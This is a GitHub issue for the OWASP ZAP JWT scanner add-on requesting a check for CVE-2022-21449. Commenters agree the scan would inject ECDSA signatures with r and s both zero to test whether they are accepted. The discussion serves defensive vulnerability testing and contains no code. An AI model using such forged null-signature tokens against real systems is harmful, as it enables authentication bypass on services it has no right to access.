owasp-zap-jwt-addon icon indicating copy to clipboard operation
owasp-zap-jwt-addon copied to clipboard

Published 20 hours ago verified publisher icon SasanLabs

Add support for Java Vuln? (CVE-2022-21449)

Open kingthorin opened this issue 2 years ago • 2 comments

Is your feature request related to a problem? Please describe. It would be great if the JWT add-on could check for JWT issues related to CVE-2022-21449.

Describe the solution you'd like Implement a scan rule/check that can detect something similar to: https://twitter.com/christophetd/status/1516878071785467904

Sample Vulnerable Application of the JWT Null Signature Vulnerability (CVE-2022-21449)

Describe alternatives you've considered N/A

Would you like to help fix this issue? Not at this time.

Additional context Nothing further.

kingthorin avatar Apr 20 '22 21:04 kingthorin

Hi, i'd like to work one this issue , if i understand i must verify that ECDSA signature with r!=0 and s!=0, and if r=s=0 so this the signature isn't accepted .

snowatlas avatar Feb 17 '23 09:02 snowatlas

Hi @snowatlas ,

Great !!!. Yes you are right. We need to inject the payloads where r and s are 0 for ECDSA.

thanks, Karan

preetkaran20 avatar Feb 18 '23 10:02 preetkaran20